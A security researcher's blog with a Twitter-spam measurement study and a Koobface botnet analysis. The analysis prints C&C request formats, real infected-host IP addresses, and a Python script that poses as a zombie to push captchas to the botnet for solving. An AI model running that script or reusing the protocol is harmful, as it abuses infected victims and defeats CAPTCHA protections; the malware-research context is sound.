@spam: The underground on 140 characters or less

This post is based on research to appear in CCS 2010; an advance PDF is available under my publications.

To understand spam propagating within Twitter, we plugged into Twitter’s streaming API and monitored tweets submitted to the site over the course of one month. Given that we have no pre-existing notion of what spam ‘looks like’, we use three blacklists to flag URLs previously identified in email spam: Google Safebrowsing, URIBL, and Joewein. Because the true destination of a link may be hidden behind URL shorteners such as bit.ly or other obfuscation techniques, we crawl each URL until reaching the final landing page and use that page’s domain to determine blacklist presence.
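The crawl-then-check step can be sketched in a few lines of Python. This is only an illustration, not our crawler: the redirects dictionary stands in for actually fetching each URL, and the domains and function names are made up for the example.

```python
from urllib.parse import urlparse

def landing_url(url, redirects, max_hops=10):
    """Follow a chain of redirects until reaching a URL that redirects nowhere."""
    seen = set()
    for _ in range(max_hops):
        if url in seen or url not in redirects:
            break  # final landing page, or a redirect loop
        seen.add(url)
        url = redirects[url]
    return url

def is_blacklisted(url, redirects, blacklist):
    """Check the domain of the final landing page, not the tweeted link."""
    domain = urlparse(landing_url(url, redirects)).hostname
    return domain in blacklist

# Hypothetical data: a shortened link that hops twice before landing
redirects = {
    "http://bit.ly/abc": "http://short.example/x",
    "http://short.example/x": "http://spam.example/win",
}
blacklist = {"spam.example"}

flagged = is_blacklisted("http://bit.ly/abc", redirects, blacklist)
```

Checking only the tweeted link would miss this URL, since bit.ly itself is not blacklisted.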

During our monitoring we gathered over 200 million tweets from the stream and crawled 25 million URLs. Over 3 million tweets were identified as spam. Of the URLs crawled, 2 million were identified as spam by blacklists, 8% of all unique links. Of these blacklisted URLs, 5% were malware and phishing, while the remaining 95% directed users towards scams.

Spam Breakdown by Type

Twitter presents itself as an entirely different delivery mechanism from email, with a vastly different audience. For that reason, we analyzed the breakdown of spam on Twitter to understand which players were involved and how they correspond to spam directed at email. As shown in the figure below, many of the traditional email scams have found their way onto Twitter, but a new category has also appeared that promises an easy way to gain Twitter followers, largely directing users to phishing pages that steal Twitter credentials.


Abuse of Twitter Features

Given the limitation of 140 characters to attract a victim’s attention, Twitter scams have evolved to abuse Twitter’s core features such as @mentions, #hashtags, and RT @ retweets.

Callouts are mentions used to target specific users in order to infiltrate their feed and appear personalized. In our data set, roughly 10% of scams were advertised using personalized mentions, while only 3% of phishing/malware used the feature. An example would be: Win an iTouch AND a $150 Apple gift card @victim! http://spam.com

Retweet Hijacking is an attempt to abuse the credibility of other users to draw a wider audience or increase trust. Given a tweet from a trusted user such as @barackobama A great battle is ahead of us…, a spammer will prepend a link and retweet the original text: http://spam.com RT @barackobama A great battle is ahead of us…. Because modifying and retweeting is common behavior, there is no simple mechanism to detect forgeries or malicious behavior.

Retweet Purchasing relies on other trusted parties to retweet spam tweets. Services such as retweet.it purport to retweet a message 50 times to 2,500 Twitter followers for $5 or 300 times to 15,000 followers for $30. The accounts used to retweet are other Twitter members (or bots) who sign up for the retweet service, allowing their accounts to be used to generate traffic.

Trend Setting is an attempt to create a trending topic on Twitter by abusing hundreds of compromised/fake accounts all tweeting with the same #hashtag. We encountered a total of 12 different attempts to generate trends using roughly 2,000 accounts each, all purporting to provide users with more followers if they provide their account credentials. Of tweets in our data set, roughly 70% of all phishing tweets included a trend setting #hashtag.

Trend Hijacking allows spammers to ride on the success of currently trending topics, allowing spam tweets to be syndicated to the entire Twittersphere rather than a limited audience of followers. Of all the #hashtags we encountered in spam, roughly 86% were user-generated topics. An example would be Help donate to #haiti relief: http://spam.com.
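To make the features above concrete, here is a rough sketch of how a tweet could be tagged with the mentions, hashtags, and retweets it contains. The regular expressions are simplified assumptions for illustration and are not the exact rules used in our analysis.

```python
import re

# Simplified patterns (assumptions): a leading @ or # not glued to a word
MENTION = re.compile(r"(?<!\w)@(\w+)")
HASHTAG = re.compile(r"(?<!\w)#(\w+)")
RETWEET = re.compile(r"\bRT @(\w+)")

def tweet_features(text):
    """Return the Twitter features present in a single tweet."""
    retweeted = RETWEET.findall(text)
    # A name following "RT" is a retweet source, not a callout
    mentions = [m for m in MENTION.findall(text) if m not in retweeted]
    return {
        "mentions": mentions,
        "hashtags": HASHTAG.findall(text),
        "retweet_of": retweeted,
    }

callout = tweet_features("Win an iTouch AND a $150 Apple gift card @victim! http://spam.com")
hijack = tweet_features("http://spam.com RT @barackobama A great battle is ahead of us")
trend = tweet_features("Help donate to #haiti relief: http://spam.com")
```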

How Successful is Twitter Spam?

Despite widespread abuse of Twitter by spammers, the current mechanisms in place to prevent spam are fairly limited. Twitter currently uses Google’s Safebrowsing API to block malicious links, simultaneously relying on account heuristics such as aggressive friending/unfriending and repeated tweets to detect spam behavior. Paired with a system designed for the dissemination of links and information, Twitter is an ideal propagation platform for spam.

To estimate Twitter clickthrough, we compare the number of clicks a link receives, as reported by bit.ly, to the number of tweets sent. Given the broadcast nature of tweeting, we measure reach as a function of both the total tweets sent t and the followers exposed to each tweet f, where reach equals t × f. When multiple accounts with differing numbers of followers all tweet a single URL, we measure total reach as the sum of each individual account’s reach. Averaging the ratio of clicks to reach for 245,000 bit.ly URLs, we find that roughly 0.13% of spam tweets generate a visit, more than an order of magnitude higher than the clickthrough rates of 0.003-0.006% reported for spam email.
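As a small worked example of the reach calculation, the sketch below computes clickthrough for one URL tweeted by two accounts. The numbers are invented for illustration and are not drawn from our data set.

```python
def reach(accounts):
    """Total reach: sum of t * f over every account that tweeted the URL.

    accounts is a list of (tweets_sent, followers) pairs.
    """
    return sum(t * f for t, f in accounts)

def clickthrough(clicks, accounts):
    """Ratio of clicks to total reach for a single URL."""
    total = reach(accounts)
    return clicks / total if total else 0.0

# Hypothetical URL: one account tweets it twice to 1,000 followers,
# another tweets it once to 500 followers, and it receives 5 clicks
accounts = [(2, 1000), (1, 500)]
rate = clickthrough(5, accounts)  # 5 / 2500
```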

Twitter’s improved clickthrough rate compared to email has a number of explanations. First, users have only 140 characters on which to base their decision about whether a URL is spam. Second, users implicitly trust the accounts they befriend. Increased clickthrough therefore potentially results from a mixture of naivety and lack of information. This result highlights the need for social networks to quickly adapt to spam threats, adopting controls similar to those used for email, though within a real-time framework.

Zion to California

Perhaps worthy of an update, I recently moved out to California to begin working for Dawn Song and Vern Paxson as a researcher at the University of California, Berkeley. If the cards have it, I hope to continue my Ph.D. work here. On the drive out I spent a few days in Zion camping and day hiking. Flickr describes the experience better than I can.

Koobface Spam

The Koobface botnet preys on social networking sites as its primary means of propagation. Unsuspecting victims browsing Facebook, Twitter, and other social networks are sent messages from users they believe to be friends. In truth, these users are either compromised accounts that fell for one of Koobface’s scams or fraudulent accounts created by Koobface. The messages sent by Koobface can be recovered by directly interacting with the Koobface C&C.

Spamming Modules

The Koobface botnet has unique spamming modules for a multitude of websites including Facebook, MySpace, Twitter, and Bebo. Despite this fact, the network level behaviour for each module follows a generic template:

POST /.sys/?action=[module name]&v=[version]

At the current time, Koobface supports 6 modules with varying version numbers. Sending a request with an outdated version will result in a signal to update the module. This can be avoided by using &v=200 for every request (the version check is a simple less-than comparison); however, doing so is a noticeable departure from typical zombie behaviour.

fbgen | Facebook
twgen | Twitter
msgen | MySpace
begen | Bebo
tggen | ?
higen | hi5

The responses from each POST are displayed below. Of the modules, only Facebook uses obfuscation. Each response contains a link and an associated message to spam.

POST /.sys/?action=fbgen&v=101
e3 14 a5 17 2d ec a0 4c 94 a3 e2 aa 6c 7e bd a6
2e 84 c1 1c ca d4 fa 55 aa 3b cc 4b 8f d8 f7 28
0f 5d e2 2e 3f b7 f5 30 b5 d8 eb 89 66 f8 89 49
f6 4e 5a e5 0e 7d c2 bd


POST /.sys/?action=twgen&v=08 

TEXT_M|OMFG!! You must see this video!! :))
TEXT_W|OMFG!! You must see this video!! :))
TEXT_S| http://www.stevesummerhill.com/index.html/
#CACHE MD5|51da895e24b09bc45f6b461a107407ee


POST /.sys/?action=msgen&v=26

I olve wathcing you opsing anked!
TEXT_B|Cooooool Video http://bit.ly/4NHlsT
TEXT_C|Cool Video http://bit.ly/4NHlsT

#SAVED 2010-01-22 16:11:36
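The plaintext responses are easy to pick apart. The sketch below assumes, based only on the samples above, that each record is a KEY|value pair, that keys starting with # carry metadata, and that any other line is free text. The function name and the three-way split are my own choices, not part of Koobface.

```python
def parse_spam_response(body):
    """Split a plaintext module response into fields, metadata, and other lines."""
    fields, meta, other = {}, {}, []
    for line in body.splitlines():
        line = line.strip()
        if not line:
            continue
        key, sep, value = line.partition("|")
        if not sep:
            other.append(line)  # no KEY|value structure, e.g. "#SAVED ..."
        elif key.startswith("#"):
            meta[key.lstrip("#")] = value.strip()
        else:
            fields[key] = value.strip()
    return fields, meta, other

# The twgen response shown above
sample = """TEXT_M|OMFG!! You must see this video!! :))
TEXT_W|OMFG!! You must see this video!! :))
TEXT_S| http://www.stevesummerhill.com/index.html/
#CACHE MD5|51da895e24b09bc45f6b461a107407ee
"""
fields, meta, other = parse_spam_response(sample)
```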

Compromised Redirectors

Each spam message provided by Koobface contains a link to a compromised website acting as a redirector to Koobface malware. For redundancy, each website is embedded with a list of 20 zombies to forward visitors towards. Given that zombies have unpredictable uptime, the compromised redirector acts as a highly available intermediary, while zombies host the actual malware and social engineering attack.

Recovering the IP addresses of zombies pointed to by a redirector is fairly simple, as the list is only lightly obfuscated: each address is split into two string fragments that are concatenated at runtime:

var b6e = [
'86.' + '126.205.43',
'68.36' + '.78.85',
'19' + '',
'24.235.' + '129.182',
'76' + '.249.244.80',
'98.' + '221.155.223',
'98' + '.208.114.221',
'173' + '.31.203.53',
'79.1' + '16.33.205',
'74.130.' + '134.165',
'88.165.' + '115.173',
'67.24' + '4.2.122',
'99.91' + '.48.26',
'95.' + '35.211.92',
'85.64' + '.111.111',
'173.18' + '.98.113',
'24' + '.99.82.56',
'65.9' + '6.238.254',
'173.' + '22.162.187',
'76' + '.31.51.190',
];

Once one of the zombies is determined to be available, a victim is redirected to a scam page modelled after Facebook or YouTube.
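Undoing the string splitting in the zombie list takes only a regular expression. The sketch below is one way to do it, assuming every entry has the two-fragment 'a' + 'b' form shown above. Entries that do not join into a complete IPv4 address are skipped rather than guessed at.

```python
import re

# Two single-quoted fragments joined by a plus sign
FRAGMENTS = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
IPV4 = re.compile(r"^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$")

def extract_zombie_ips(js_source):
    """Rejoin split string literals and keep those that form valid IPv4 addresses."""
    ips = []
    for left, right in FRAGMENTS.findall(js_source):
        candidate = left + right
        match = IPV4.match(candidate)
        if match and all(int(octet) <= 255 for octet in match.groups()):
            ips.append(candidate)
    return ips

# First three entries of the redirector list above
sample = """var b6e = [
'86.' + '126.205.43',
'68.36' + '.78.85',
'19' + '',
"""
ips = extract_zombie_ips(sample)
```

The incomplete third entry is dropped, leaving the two full addresses.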

Hijacking Koobface’s Captcha Solver

One of the interesting challenges of propagating malware through social media is the requirement of obtaining new accounts for spamming. The Koobface botnet automates this process by leveraging zombies to sign up for accounts on Facebook, Gmail, Blogger, and Google Reader. Each of these services requires a solution to a Captcha challenge, which Koobface pushes onto the owner of a zombie machine to solve. During the course of infection, a Koobface zombie will repeatedly poll the C&C for Captchas requiring solutions, in turn prompting the user with a threat to shut down the machine unless the Captcha is solved. As any zombie can query the botnet for a Captcha solution, an adversary can re-purpose the botnet into a personal Captcha solver.

Initiating a Request

A Captcha request to the system can target either Google’s Captcha software or reCAPTCHA; in the case of Google, a flag &b=goo is appended to the request. As with most traffic between a zombie and the Koobface C&C, traffic occurs in plaintext over HTTP. Solving a Captcha is initiated by sending an HTTP POST to a Koobface C&C server. The HTTP POST includes the raw JPG data for the Captcha image to be solved, which will be displayed on a victim’s machine.

POST /.sys/?post=true&path=captcha&a=save[&b=goo]

The Koobface server will return a random identifier that’s appended in future requests to the server as a zombie repeatedly probes for a response:

POST /.sys/?post=true&path=captcha&a=query[&b=goo]&id=26076175

For each solution request, the server will respond with one of three states, directing the bot to its appropriate behaviour:

1 | Pending; repeat request at later time
3 | Solution available
0 | Abandon current request; no one has solved in maximum timeout
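The polling behaviour implied by these three states can be sketched as a small loop. Here query is a hypothetical callable standing in for the HTTP request; I assume it returns just the state code as a string, and the sketch does not cover how the solution text itself is delivered.

```python
import time

PENDING, SOLVED, ABANDON = "1", "3", "0"

def poll_until_done(query, max_polls=10, delay=0.0):
    """Call query() until the state is no longer pending.

    Returns "solved", "abandoned", "unknown", or "timeout".
    """
    for _ in range(max_polls):
        state = query().strip()
        if state == PENDING:
            time.sleep(delay)  # repeat the request at a later time
            continue
        if state == SOLVED:
            return "solved"
        if state == ABANDON:
            return "abandoned"
        return "unknown"  # a state code not listed in the table above
    return "timeout"

# Simulated server: pending twice, then a solution becomes available
responses = iter(["1", "1", "3"])
outcome = poll_until_done(lambda: next(responses))
```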

Solution Mechanism

Once injected, a separate zombie will randomly probe for a Captcha requiring a solution and submit a victim’s response to the C&C. The zombie also reports its version [&v=20] and the number of attempts it has made contacting the C&C for a Captcha [&i=0; i++ for each failed attempt].

# Request a Captcha ID requiring a solution. 
GET /.sys/?action=captcha&a=get&i=0&v=20

# Request the image associated with a given ID
GET /.sys/?action=captcha&a=image&i=3&v=20&id=23063812

# Upload a response
GET /.sys/?action=captcha&a=put&id=23063812&v=20&code=valid%20text
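For reference, the three request paths above can be generated as follows. The helper names are my own; the only non-obvious detail is that the submitted text must be URL-encoded, so a space becomes %20.

```python
from urllib.parse import quote

BASE = "/.sys/?action=captcha"

def get_path(attempt, version=20):
    """Path for requesting a Captcha ID that needs a solution."""
    return "%s&a=get&i=%d&v=%d" % (BASE, attempt, version)

def image_path(captcha_id, attempt, version=20):
    """Path for fetching the image associated with a given ID."""
    return "%s&a=image&i=%d&v=%d&id=%s" % (BASE, attempt, version, captcha_id)

def put_path(captcha_id, code, version=20):
    """Path for uploading a response; the answer text is URL-encoded."""
    return "%s&a=put&id=%s&v=%d&code=%s" % (BASE, captcha_id, version, quote(code))

upload = put_path("23063812", "valid text")
```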

Use of the goo flag when injecting a packet is necessary as victims are prompted with different instructions depending on the type of Captcha being solved. Given the wrong flag, a valid solution won’t be accepted due to a regular expression mismatch; Google has only one word in its Captchas, while reCAPTCHA uses two words.

Enter both words below, separated by a space.|
       ([a-zA-Z0-9\$\.\,\/]+)([ ]+)([a-zA-Z0-9\$\.\,\/]+)
Enter the word below.|
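The two-word pattern above can be tried out directly in Python. Whether Koobface anchors the match to the whole input is not something I verified; the sketch assumes a full match, which is enough to show why a one-word answer is rejected under the two-word prompt.

```python
import re

# The two-word pattern listed above for reCAPTCHA-style prompts
TWO_WORDS = re.compile(r"([a-zA-Z0-9\$\.\,\/]+)([ ]+)([a-zA-Z0-9\$\.\,\/]+)")

def matches_two_word_prompt(answer):
    """True if the answer is two allowed-character words separated by spaces."""
    return TWO_WORDS.fullmatch(answer) is not None

two_words_ok = matches_two_word_prompt("valid text")
one_word_ok = matches_two_word_prompt("single")
```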

Python Implementation

import logging
import random
import re
import socket

def send_packet(domain,packet):
    # Open a TCP connection to port 80, send the raw request, and return
    # up to 1024 bytes of the response (None on any socket failure)
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((domain, 80))
        s.sendall(packet)
        resp = s.recv(1024)
        s.close()
        return resp
    except (socket.error,socket.herror,socket.gaierror,socket.timeout):
        logging.error("Failed to query socket")
        return None

def captcha_query():

    # Select a random C&C domain from list of Koobface hosts
    # (CC_DOMAINS and fetch_image() are assumed to be defined elsewhere)
    domain = random.choice(CC_DOMAINS)
    domain = re.sub(r'^(http://)?(www\.)?','',domain)

    # Fetch a Captcha image to be solved
    data = fetch_image()
    length = len(data)

    # Mimic Koobface's zombie behavior
    packet = "POST /.sys/?post=true&path=captcha&a=save&b=goo HTTP/1.0\r\n" + \
             "accept-encoding: text/html, text/plain\r\nConnection: close\r\n" + \
             "Host: %s\r\nUser-Agent: Mozilla/5.01 " %(domain)+ \
             "(Windows; U; Windows NT 5.2; ru; rv: " + \
             "Gecko/20050104 Firefox/3.0.2\r\n" + \
             "Content-Type: binary/octet-stream\r\n" + \
             "Content-Length: %s\r\n\r\n" %(length)
    # Headers are ASCII text; the image is appended as raw bytes
    # (assumes fetch_image() returns bytes)
    packet = packet.encode("ascii") + data

    # Send packet over a plain TCP socket
    resp = send_packet(domain,packet)